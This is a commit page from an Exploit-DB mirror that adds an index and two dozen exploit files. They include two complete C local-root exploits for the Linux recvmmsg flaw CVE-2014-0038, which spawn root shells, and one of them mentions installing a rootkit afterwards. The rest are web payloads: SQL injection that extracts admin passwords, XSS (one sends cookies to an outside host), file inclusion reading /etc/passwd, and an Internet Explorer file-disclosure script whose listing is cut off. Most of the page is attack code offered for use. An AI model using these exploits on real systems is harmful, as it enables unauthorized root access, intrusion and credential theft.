bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

Updated 02_04_2014

Browse source
This commit is contained in:
Offensive Security 2014-02-04 04:25:40 +00:00
parent 8a34f6a372
commit ef9336acb4
25 changed files with 784 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

24
files.csv
View file

@ -28149,3 +28149,27 @@ id,file,description,date,author,platform,type,port
31342,platforms/hardware/remote/31342.txt,"Airspan ProST WiMAX Device Web Interface Authentication Bypass Vulnerability",2008-03-06,"Francis Lacoste-Cordeau",hardware,remote,0
31344,platforms/php/webapps/31344.pl,"PHP-Nuke KutubiSitte Module 'kid' Parameter SQL Injection Vulnerability",2008-03-06,r080cy90r,php,webapps,0
31345,platforms/windows/remote/31345.txt,"MicroWorld eScan Server 9.0.742 Directory Traversal Vulnerability",2008-03-06,"Luigi Auriemma",windows,remote,0
31346,platforms/linux/local/31346.c,"Linux 3.4+ Arbitrary write with CONFIG_X86_X32",2014-02-02,saelo,linux,local,0
31347,platforms/linux/local/31347.c,"linux 3.4+ local root (CONFIG_X86_X32=y)",2014-02-02,rebel,linux,local,0
31351,platforms/php/webapps/31351.txt,"PHP-Nuke 4nChat Module 0.91 'roomid' Parameter SQL Injection Vulnerability",2008-03-06,meloulisi,php,webapps,0
31352,platforms/php/webapps/31352.txt,"ImageVue 1.7 popup.php path Parameter XSS",2008-03-07,ZoRLu,php,webapps,0
31353,platforms/php/webapps/31353.txt,"ImageVue 1.7 dir2.php path Parameter XSS",2008-03-07,ZoRLu,php,webapps,0
31354,platforms/php/webapps/31354.txt,"ImageVue 1.7 upload.php path Parameter XSS",2008-03-07,ZoRLu,php,webapps,0
31355,platforms/php/webapps/31355.txt,"ImageVue 1.7 dirxml.php path Parameter XSS",2008-03-07,ZoRLu,php,webapps,0
31356,platforms/php/webapps/31356.txt,"WordPress 2.3.2 wp-admin/users.php inviteemail Parameter XSS",2008-03-07,Doz,php,webapps,0
31357,platforms/php/webapps/31357.txt,"WordPress 2.3.2 wp-admin/invites.php to Parameter XSS",2008-03-07,Doz,php,webapps,0
31358,platforms/php/webapps/31358.txt,"Specimen Image Database taxonservice.php dir Parameter Remote File Inclusion",2008-03-07,ZoRLu,php,webapps,0
31359,platforms/windows/remote/31359.html,"Microsoft Internet Explorer 7.0 Combined JavaScript and XML Remote Information Disclosure Vulnerability",2008-03-07,"Ronald van den Heetkamp",windows,remote,0
31362,platforms/multiple/remote/31362.txt,"Neptune Web Server 3.0 404 Error Page Cross Site Scripting Vulnerability",2008-03-07,NetJackal,multiple,remote,0
31364,platforms/hardware/remote/31364.txt,"F5 BIG-IP 9.4.3 Web Management Interface Console HTML Injection Vulnerability",2008-03-08,nnposter,hardware,remote,0
31365,platforms/php/webapps/31365.txt,"Alkacon OpenCMS 7.0.3 logfileViewSettings.jsp filePath Parameter XSS",2008-03-08,nnposter,php,webapps,0
31366,platforms/php/webapps/31366.txt,"Alkacon OpenCMS 7.0.3 logfileViewSettings.jsp filePath.0 Parameter Arbitrary File Access",2008-03-08,nnposter,php,webapps,0
31367,platforms/php/webapps/31367.txt,"Batchelor Media BM Classifieds Multiple SQL Injection Vulnerabilities",2008-03-09,xcorpitx,php,webapps,0
31368,platforms/php/webapps/31368.txt,"PHP-Nuke 4nAlbum Module 0.92 'pid' Parameter SQL Injection Vulnerability",2008-03-10,meloulisi,php,webapps,0
31369,platforms/php/webapps/31369.txt,"Gallarific search.php query Parameter XSS",2008-03-10,ZoRLu,php,webapps,0
31370,platforms/php/webapps/31370.txt,"Gallarific Multiple Script Direct Request Authentication Bypass",2008-03-10,ZoRLu,php,webapps,0
31371,platforms/php/webapps/31371.txt,"EasyImageCatalogue 1.31 index.php Multiple Parameter XSS",2008-03-12,ZoRLu,php,webapps,0
31372,platforms/php/webapps/31372.txt,"EasyImageCatalogue 1.31 thumber.php dir Parameter XSS",2008-03-12,ZoRLu,php,webapps,0
31373,platforms/php/webapps/31373.txt,"EasyImageCatalogue 1.31 describe.php d Parameter XSS",2008-03-12,ZoRLu,php,webapps,0
31374,platforms/php/webapps/31374.txt,"EasyImageCatalogue 1.31 addcomment.php d Parameter XSS",2008-03-12,ZoRLu,php,webapps,0
31375,platforms/php/webapps/31375.txt,"Drake CMS 0.4.11 RC8 'd_root' Parameter Local File Include Vulnerability",2008-03-10,THE_MILLER,php,webapps,0

Can't render this file because it is too large.

9
platforms/hardware/remote/31364.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/28151/info
F5 BIG-IP Web Management Interface is prone to a HTML-injection vulnerability because the web management interface fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected device. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
The vulnerability affects F5 BIG-IP 9.4.3; other versions may be also affected.
https://(target)/dms/policy/rep_request.php?report_type=%22%3E%3Cbody+onload=alert(%26quot%3BXSS%26quot%3B)%3E%3Cfoo+

199
platforms/linux/local/31346.c Executable file
View file

@ -0,0 +1,199 @@
/*
* Local root exploit for CVE-2014-0038.
*
* https://raw.github.com/saelo/cve-2014-0038/master/timeoutpwn.c
*
* Bug: The X86_X32 recvmmsg syscall does not properly sanitize the timeout pointer
* passed from userspace.
*
* Exploit primitive: Pass a pointer to a kernel address as timeout for recvmmsg,
* if the original byte at that address is known it can be overwritten
* with known data.
* If the least significant byte is 0xff, waiting 255 seconds will turn it into a 0x00.
*
* Restrictions: The first long at the passed address (tv_sec) has to be positive
* and the second long (tv_nsec) has to be smaller than 1000000000.
*
* Overview: Target the release function pointer of the ptmx_fops structure located in
* non initialized (and thus writable) kernel memory. Zero out the three most
* significant bytes and thus turn it into a pointer to an address mappable in
* user space.
* The release pointer is used as it is followed by 16 0x00 bytes (so the tv_nsec
* is valid).
* Open /dev/ptmx, close it and enjoy.
*
* Not very beautiful but should be fairly reliable if symbols can be resolved.
*
* Tested on Ubuntu 13.10
*
* gcc timeoutpwn.c -o pwn && ./pwn
*
* Written by saelo
*/
#define _GNU_SOURCE
#include <netinet/ip.h>
#include <stdio.h>
#include <stdlib.h>
#include <time.h>
#include <string.h>
#include <unistd.h>
#include <fcntl.h>
#include <sys/socket.h>
#include <sys/stat.h>
#include <sys/syscall.h>
#include <sys/wait.h>
#include <sys/mman.h>
#define __X32_SYSCALL_BIT 0x40000000
#undef __NR_recvmmsg
#define __NR_recvmmsg (__X32_SYSCALL_BIT + 537)
#define BUFSIZE 200
#define PAYLOADSIZE 0x2000
#define FOPS_RELEASE_OFFSET 13*8
/*
* Adapt these addresses for your need.
* see /boot/System.map* or /proc/kallsyms
* These are the offsets from ubuntu 3.11.0-12-generic.
*/
#define PTMX_FOPS 0xffffffff81fb30c0LL
#define TTY_RELEASE 0xffffffff8142fec0LL
#define COMMIT_CREDS 0xffffffff8108ad40LL
#define PREPARE_KERNEL_CRED 0xffffffff8108b010LL
typedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred);
typedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred);
/*
* Match signature of int release(struct inode*, struct file*).
*
* See here: http://grsecurity.net/~spender/exploits/enlightenment.tgz
*/
int __attribute__((regparm(3)))
kernel_payload(void* foo, void* bar)
{
_commit_creds commit_creds = (_commit_creds)COMMIT_CREDS;
_prepare_kernel_cred prepare_kernel_cred = (_prepare_kernel_cred)PREPARE_KERNEL_CRED;
*((int*)(PTMX_FOPS + FOPS_RELEASE_OFFSET + 4)) = -1; // restore pointer
commit_creds(prepare_kernel_cred(0));
return -1;
}
/*
* Write a zero to the byte at then given address.
* Only works if the current value is 0xff.
*/
void zero_out(long addr)
{
int sockfd, retval, port, pid, i;
struct sockaddr_in sa;
char buf[BUFSIZE];
struct mmsghdr msgs;
struct iovec iovecs;
srand(time(NULL));
port = 1024 + (rand() % (0x10000 - 1024));
sockfd = socket(AF_INET, SOCK_DGRAM, 0);
if (sockfd == -1) {
perror("socket()");
exit(EXIT_FAILURE);
}
sa.sin_family = AF_INET;
sa.sin_addr.s_addr = htonl(INADDR_LOOPBACK);
sa.sin_port = htons(port);
if (bind(sockfd, (struct sockaddr *) &sa, sizeof(sa)) == -1) {
perror("bind()");
exit(EXIT_FAILURE);
}
memset(&msgs, 0, sizeof(msgs));
iovecs.iov_base = buf;
iovecs.iov_len = BUFSIZE;
msgs.msg_hdr.msg_iov = &iovecs;
msgs.msg_hdr.msg_iovlen = 1;
/*
* start a seperate process to send a udp message after 255 seconds so the syscall returns,
* but not after updating the timout struct and writing the remaining time into it.
* 0xff - 255 seconds = 0x00
*/
printf("clearing byte at 0x%lx\n", addr);
pid = fork();
if (pid == 0) {
memset(buf, 0x41, BUFSIZE);
if ((sockfd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP)) == -1) {
perror("socket()");
exit(EXIT_FAILURE);
}
sa.sin_family = AF_INET;
sa.sin_addr.s_addr = htonl(INADDR_LOOPBACK);
sa.sin_port = htons(port);
printf("waiting 255 seconds...\n");
for (i = 0; i < 255; i++) {
if (i % 10 == 0)
printf("%is/255s\n", i);
sleep(1);
}
printf("waking up parent...\n");
sendto(sockfd, buf, BUFSIZE, 0, &sa, sizeof(sa));
exit(EXIT_SUCCESS);
} else if (pid > 0) {
retval = syscall(__NR_recvmmsg, sockfd, &msgs, 1, 0, (void*)addr);
if (retval == -1) {
printf("address can't be written to, not a valid timespec struct\n");
exit(EXIT_FAILURE);
}
waitpid(pid, 0, 0);
printf("byte zeroed out\n");
} else {
perror("fork()");
exit(EXIT_FAILURE);
}
}
int main(int argc, char** argv)
{
long code, target;
int pwn;
/* Prepare payload... */
printf("preparing payload buffer...\n");
code = (long)mmap((void*)(TTY_RELEASE & 0x000000fffffff000LL), PAYLOADSIZE, 7, 0x32, 0, 0);
memset((void*)code, 0x90, PAYLOADSIZE);
code += PAYLOADSIZE - 1024;
memcpy((void*)code, &kernel_payload, 1024);
/*
* Now clear the three most significant bytes of the fops pointer
* to the release function.
* This will make it point into the memory region mapped above.
*/
printf("changing kernel pointer to point into controlled buffer...\n");
target = PTMX_FOPS + FOPS_RELEASE_OFFSET;
zero_out(target + 7);
zero_out(target + 6);
zero_out(target + 5);
/* ... and trigger. */
printf("releasing file descriptor to call manipulated pointer in kernel mode...\n");
pwn = open("/dev/ptmx", 'r');
close(pwn);
if (getuid() != 0) {
printf("failed to get root :(\n");
exit(EXIT_FAILURE);
}
printf("got root, enjoy :)\n");
return execl("/bin/bash", "-sh", NULL);
}

226
platforms/linux/local/31347.c Executable file
View file

@ -0,0 +1,226 @@
/*
*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*
recvmmsg.c - linux 3.4+ local root (CONFIG_X86_X32=y)
CVE-2014-0038 / x32 ABI with recvmmsg
by rebel @ irc.smashthestack.org
-----------------------------------
takes about 13 minutes to run because timeout->tv_sec is decremented
once per second and 0xff*3 is 765.
some things you could do while waiting:
* watch http://www.youtube.com/watch?v=OPyZGCKu2wg 3 times
* read https://wiki.ubuntu.com/Security/Features and smirk a few times
* brew some coffee
* stare at the countdown giggly with anticipation
could probably whack the high bits of some pointer with nanoseconds,
but that would require a bunch of nulls before the pointer and then
reading an oops from dmesg which isn't that elegant.
&net_sysctl_root.permissions is nice because it has 16 trailing nullbytes
hardcoded offsets because I only saw this on ubuntu & kallsyms is protected
anyway..
same principle will work on 32bit but I didn't really find any major
distros shipping with CONFIG_X86_X32=y
user@ubuntu:~$ uname -a
Linux ubuntu 3.11.0-15-generic #23-Ubuntu SMP Mon Dec 9 18:17:04 UTC 2013 x86_64 x86_64 x86_64 GNU/Linux
user@ubuntu:~$ gcc recvmmsg.c -o recvmmsg
user@ubuntu:~$ ./recvmmsg
byte 3 / 3.. ~0 secs left.
w00p w00p!
# id
uid=0(root) gid=0(root) groups=0(root)
# sh phalanx-2.6b-x86_64.sh
unpacking..
:)=
greets to my homeboys kaliman, beist, capsl & all of #social
Sat Feb 1 22:15:19 CET 2014
% rebel %
*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*
*/
#define _GNU_SOURCE
#include <netinet/ip.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/socket.h>
#include <unistd.h>
#include <sys/syscall.h>
#include <sys/mman.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <sys/utsname.h>
#define __X32_SYSCALL_BIT 0x40000000
#undef __NR_recvmmsg
#define __NR_recvmmsg (__X32_SYSCALL_BIT + 537)
#define VLEN 1
#define BUFSIZE 200
int port;
struct offset {
char *kernel_version;
unsigned long dest; // net_sysctl_root + 96
unsigned long original_value; // net_ctl_permissions
unsigned long prepare_kernel_cred;
unsigned long commit_creds;
};
struct offset offsets[] = {
{"3.11.0-15-generic",0xffffffff81cdf400+96,0xffffffff816d4ff0,0xffffffff8108afb0,0xffffffff8108ace0}, // Ubuntu 13.10
{"3.11.0-12-generic",0xffffffff81cdf3a0,0xffffffff816d32a0,0xffffffff8108b010,0xffffffff8108ad40}, // Ubuntu 13.10
{"3.8.0-19-generic",0xffffffff81cc7940,0xffffffff816a7f40,0xffffffff810847c0, 0xffffffff81084500}, // Ubuntu 13.04
{NULL,0,0,0,0}
};
void udp(int b) {
int sockfd;
struct sockaddr_in servaddr,cliaddr;
int s = 0xff+1;
if(fork() == 0) {
while(s > 0) {
fprintf(stderr,"\rbyte %d / 3.. ~%d secs left \b\b\b\b",b+1,3*0xff - b*0xff - (0xff+1-s));
sleep(1);
s--;
fprintf(stderr,".");
}
sockfd = socket(AF_INET,SOCK_DGRAM,0);
bzero(&servaddr,sizeof(servaddr));
servaddr.sin_family = AF_INET;
servaddr.sin_addr.s_addr=htonl(INADDR_LOOPBACK);
servaddr.sin_port=htons(port);
sendto(sockfd,"1",1,0,(struct sockaddr *)&servaddr,sizeof(servaddr));
exit(0);
}
}
void trigger() {
open("/proc/sys/net/core/somaxconn",O_RDONLY);
if(getuid() != 0) {
fprintf(stderr,"not root, ya blew it!\n");
exit(-1);
}
fprintf(stderr,"w00p w00p!\n");
system("/bin/sh -i");
}
typedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred);
typedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred);
_commit_creds commit_creds;
_prepare_kernel_cred prepare_kernel_cred;
// thx bliss
static int __attribute__((regparm(3)))
getroot(void *head, void * table)
{
commit_creds(prepare_kernel_cred(0));
return -1;
}
void __attribute__((regparm(3)))
trampoline()
{
asm("mov $getroot, %rax; call *%rax;");
}
int main(void)
{
int sockfd, retval, i;
struct sockaddr_in sa;
struct mmsghdr msgs[VLEN];
struct iovec iovecs[VLEN];
char buf[BUFSIZE];
long mmapped;
struct utsname u;
struct offset *off = NULL;
uname(&u);
for(i=0;offsets[i].kernel_version != NULL;i++) {
if(!strcmp(offsets[i].kernel_version,u.release)) {
off = &offsets[i];
break;
}
}
if(!off) {
fprintf(stderr,"no offsets for this kernel version..\n");
exit(-1);
}
mmapped = (off->original_value & ~(sysconf(_SC_PAGE_SIZE) - 1));
mmapped &= 0x000000ffffffffff;
srand(time(NULL));
port = (rand() % 30000)+1500;
commit_creds = (_commit_creds)off->commit_creds;
prepare_kernel_cred = (_prepare_kernel_cred)off->prepare_kernel_cred;
mmapped = (long)mmap((void *)mmapped, sysconf(_SC_PAGE_SIZE)*3, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_PRIVATE|MAP_ANONYMOUS|MAP_FIXED, 0, 0);
if(mmapped == -1) {
perror("mmap()");
exit(-1);
}
memset((char *)mmapped,0x90,sysconf(_SC_PAGE_SIZE)*3);
memcpy((char *)mmapped + sysconf(_SC_PAGE_SIZE), (char *)&trampoline, 300);
if(mprotect((void *)mmapped, sysconf(_SC_PAGE_SIZE)*3, PROT_READ|PROT_EXEC) != 0) {
perror("mprotect()");
exit(-1);
}
sockfd = socket(AF_INET, SOCK_DGRAM, 0);
if (sockfd == -1) {
perror("socket()");
exit(-1);
}
sa.sin_family = AF_INET;
sa.sin_addr.s_addr = htonl(INADDR_LOOPBACK);
sa.sin_port = htons(port);
if (bind(sockfd, (struct sockaddr *) &sa, sizeof(sa)) == -1) {
perror("bind()");
exit(-1);
}
memset(msgs, 0, sizeof(msgs));
iovecs[0].iov_base = &buf;
iovecs[0].iov_len = BUFSIZE;
msgs[0].msg_hdr.msg_iov = &iovecs[0];
msgs[0].msg_hdr.msg_iovlen = 1;
for(i=0;i < 3 ;i++) {
udp(i);
retval = syscall(__NR_recvmmsg, sockfd, msgs, VLEN, 0, (void *)off->dest+7-i);
if(!retval) {
fprintf(stderr,"\nrecvmmsg() failed\n");
}
}
close(sockfd);
fprintf(stderr,"\n");
trigger();
}

9
platforms/multiple/remote/31362.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/28148/info
Neptune Web Server is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
Neptune Web Server Professional Edition 3.0 is vulnerable; other versions may also be affected.
http://www.example.com/<IMG SRC="javascript:alert('XSS');">

9
platforms/php/webapps/31351.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/28128/info
The 4nChat module for PHP-Nuke is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com/modules.php?name=modload&name=4nChat&file=index&roomid=-2+union+select+1,aid,3,4,5+from+nuke_authors
http://www.example.com/modules.php?name=modload&name=4nChat&file=index&roomid=-2+union+select+1,pwd,3,4,5+from+nuke_authors
http://www.example.com/modules.php?name=modload&name=4nChat&file=index&roomid=-2+union+select+1,email,3,4,5+from+nuke_authors

9
platforms/php/webapps/31352.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/28138/info
Imagevue is prone to multiple cross-site scripting vulnerabilities because the application fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
Imagevue 1.7 is vulnerable; other versions may also be affected.
http://www.example.com/upload/popup.php?path="><script>alert("xss")</script>

9
platforms/php/webapps/31353.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/28138/info
Imagevue is prone to multiple cross-site scripting vulnerabilities because the application fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
Imagevue 1.7 is vulnerable; other versions may also be affected.
http://www.example.com/upload/test/dir2.php?path="><script>alert("xss")</script>

9
platforms/php/webapps/31354.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/28138/info
Imagevue is prone to multiple cross-site scripting vulnerabilities because the application fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
Imagevue 1.7 is vulnerable; other versions may also be affected.
http://www.example.com/upload/admin/upload.php?path="><script>alert("xss")</script>

9
platforms/php/webapps/31355.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/28138/info
Imagevue is prone to multiple cross-site scripting vulnerabilities because the application fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
Imagevue 1.7 is vulnerable; other versions may also be affected.
http://www.example.com/upload/dirxml.php?path="><script>alert("xss")</script>

9
platforms/php/webapps/31356.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/28139/info
WordPress is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
WordPress 2.3.2 is vulnerable; other versions may also be affected.
http://www.example.com/wp-admin/users.php?update=invite&inviteemail=>< iframe src=http://members.lycos.co.uk/Account/CookieMonster.php width=0 height=0>

9
platforms/php/webapps/31357.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/28139/info
WordPress is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
WordPress 2.3.2 is vulnerable; other versions may also be affected.
http://www.example.com/wp-admin/invites.php?result=sent&to=%22%3E%3Cscript%3Ealert

8
platforms/php/webapps/31358.txt Executable file
View file

@ -0,0 +1,8 @@
source: http://www.securityfocus.com/bid/28142/info
SID (Specimen Image Database) is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied input.
Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible.
http://www.example.com/SID_box_notns_path/taxonservice.php?dir=shell.txt?

16
platforms/php/webapps/31365.txt Executable file
View file

@ -0,0 +1,16 @@
source: http://www.securityfocus.com/bid/28152/info
Alkacon OpenCms is prone to multiple input-validation vulnerabilities, including one cross-site scripting issue and a file-disclosure issue, because the application fails to properly sanitize user-supplied input.
Attackers can exploit these issues to steal cookie-based authentication credentials, to control how the site is rendered to the user, or to obtain information that could aid in further attacks.
OpenCms 7.0.3 is vulnerable; other versions may also be affected.
http://www.example.com/opencms/system/workplace/admin/workplace/logfileview/logfileViewSettings.jsp?
isLogfile.0=true&isLogfile.0.value=true&enabled.0=true&enabled.0.value=true
&ok=Ok&action=save
&closelink=%252Fopencms%252Fopencms%252Fsystem%252Fworkplace%252Fviews%252Fadmin%252Fadmin-main.jsp%253Fpath%253D%252Fworkplace%252Flogfileview
&elementname=undefined&page=page1&style=new
&path=%252Fworkplace%252Flogfileview%252FlogfileViewSettings
&elementindex=0&framename=admin_content&windowSize.0=8000&fileEncoding.0=UTF-8
&filePath.0=%3C%2Fscript%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E

16
platforms/php/webapps/31366.txt Executable file
View file

@ -0,0 +1,16 @@
source: http://www.securityfocus.com/bid/28152/info
Alkacon OpenCms is prone to multiple input-validation vulnerabilities, including one cross-site scripting issue and a file-disclosure issue, because the application fails to properly sanitize user-supplied input.
Attackers can exploit these issues to steal cookie-based authentication credentials, to control how the site is rendered to the user, or to obtain information that could aid in further attacks.
OpenCms 7.0.3 is vulnerable; other versions may also be affected.
http://www.example.com/opencms/system/workplace/admin/workplace/logfileview/logfileViewSettings.jsp?
isLogfile.0=true&isLogfile.0.value=true&enabled.0=true&enabled.0.value=true
&ok=Ok&action=save
&closelink=%252Fopencms%252Fopencms%252Fsystem%252Fworkplace%252Fviews%252Fadmin%252Fadmin-main.jsp%253Fpath%253D%252Fworkplace%252Flogfileview
&elementname=undefined&page=page1&style=new
&path=%252Fworkplace%252Flogfileview%252FlogfileViewSettings
&elementindex=0&framename=admin_content&windowSize.0=8000&fileEncoding.0=UTF-8
&filePath.0=%2Fetc%2Fpasswd

8
platforms/php/webapps/31367.txt Executable file
View file

@ -0,0 +1,8 @@
source: http://www.securityfocus.com/bid/28159/info
BM Classifieds is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com/showad.php?listingid=xCoRpiTx&cat=-99/**/union+select/**/concat(username,0x3a,email),password,2/**/from/**/users/*
http://www.example.com/pfriendly.php?ad=-99%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0,1,concat(username,0x3a,email),password,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,

9
platforms/php/webapps/31368.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/28162/info
The 4nAlbum module for PHP-Nuke is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com/modules.php?name=modload&name=4nAlbum&file=index&do=showpic&pid=-14+union+select+1,2,3,4,5,6,aid,8,9,10,11,12,13,14,15,16,17,18,19,20,21+from+nuke_authors
http://www.example.com/modules.php?name=modload&name=4nAlbum&file=index&do=showpic&pid=-14+union+select+1,2,3,4,5,6,pwd,8,9,10,11,12,13,14,15,16,17111,18,19,20,21+from+nuke_authors
http://www.example.com/modules.php?name=modload&name=4nAlbum&file=index&do=showpic&pid=-14+union+select+1,2,3,4,5,6,email,8,9,10,11,12,13,14,15,16,17111,18,19,20,21+from+nuke_authors

9
platforms/php/webapps/31369.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/28163/info
Gallarific is prone to a cross-site scripting vulnerability and multiple authentication-bypass vulnerabilities.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site, steal cookie-based authentication credentials, add new categories, add new users, and modify existing users. Other attacks are also possible.
These issues affect both the commercial and the free versions of Gallarific.
http://www.example.com/gallery/search.php?dosearch=true&query="><script>alert(document.cookie)</script>

11
platforms/php/webapps/31370.txt Executable file
View file

@ -0,0 +1,11 @@
source: http://www.securityfocus.com/bid/28163/info
Gallarific is prone to a cross-site scripting vulnerability and multiple authentication-bypass vulnerabilities.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site, steal cookie-based authentication credentials, add new categories, add new users, and modify existing users. Other attacks are also possible.
These issues affect both the commercial and the free versions of Gallarific.
http://www.example.com/gallery/gadmin/index.php?task=add (categori add)
http://www.example.com/gallery/gadmin/users.php?task=edit&id=2 (user edit)
http://www.example.com/gallery/gadmin/users.php?task=add (user add)

10
platforms/php/webapps/31371.txt Executable file
View file

@ -0,0 +1,10 @@
source: http://www.securityfocus.com/bid/28164/info
onlinetools.org EasyImageCatalogue is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
EasyImageCatalogue 1.31 is vulnerable; other versions may also be affected.
http://www.example.com/index.php?search="><script>alert()</script>
http://www.example.com/index.php?d="><script>alert()</script>

9
platforms/php/webapps/31372.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/28164/info
onlinetools.org EasyImageCatalogue is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
EasyImageCatalogue 1.31 is vulnerable; other versions may also be affected.
http://www.example.com/thumber.php?dir="><script>alert()</script>

9
platforms/php/webapps/31373.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/28164/info
onlinetools.org EasyImageCatalogue is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
EasyImageCatalogue 1.31 is vulnerable; other versions may also be affected.
http://www.example.com/describe.php?d="><script>alert()</script>

9
platforms/php/webapps/31374.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/28164/info
onlinetools.org EasyImageCatalogue is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
EasyImageCatalogue 1.31 is vulnerable; other versions may also be affected.
http://www.example.com/addcomment.php?d="><script>alert()</script>

9
platforms/php/webapps/31375.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/28165/info
Drake CMS is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input.
Exploiting this issue may allow an unauthorized user to view files and execute local scripts.
Drake CMS 0.4.11_RC8 is vulnerable; other versions may also be affected.
http://www.example.com/install/index.php?d_root=/etc/passwd%00

131
platforms/windows/remote/31359.html Executable file
View file

@ -0,0 +1,131 @@
source: http://www.securityfocus.com/bid/28143/info
Microsoft Internet Explorer is prone to a remote information-disclosure vulnerability because of a flaw in the interaction between JavaScript and XML processing in Internet Explorer.
To exploit this issue, an attacker must entice an unsuspecting user to visit a malicious website.
Successfully exploiting this issue allows remote attackers to gain access to the first line of arbitrary files located on computers running the vulnerable application.
<script language="JavaScript">
// load new XML document.
var xmlDoc = new ActiveXObject("Microsoft.XMLDOM");
function XML(file,list) {
/*
Available error messages:
------------------------
:: parseError.errorCode
:: parseError.reason
:: parseError.line
:: parseError.linePos
:: parseError.srcText
------------------------
*/
xmlDoc.async="false";
xmlDoc.validateOnParse = "true";
xmlDoc.onreadystatechange=chk;
xmlDoc.load(file);
if(list) {
listXML(xmlDoc.documentElement)
} else {
document.write(xmlDoc.parseError.srcText);
}
}
function chk() {
return (xmlDoc.readyState!=4) ? false:true;
}
function listXML(xmlsrc) {
// for valid DTD files, list the complete tree
if(xmlsrc.hasChildNodes()) {
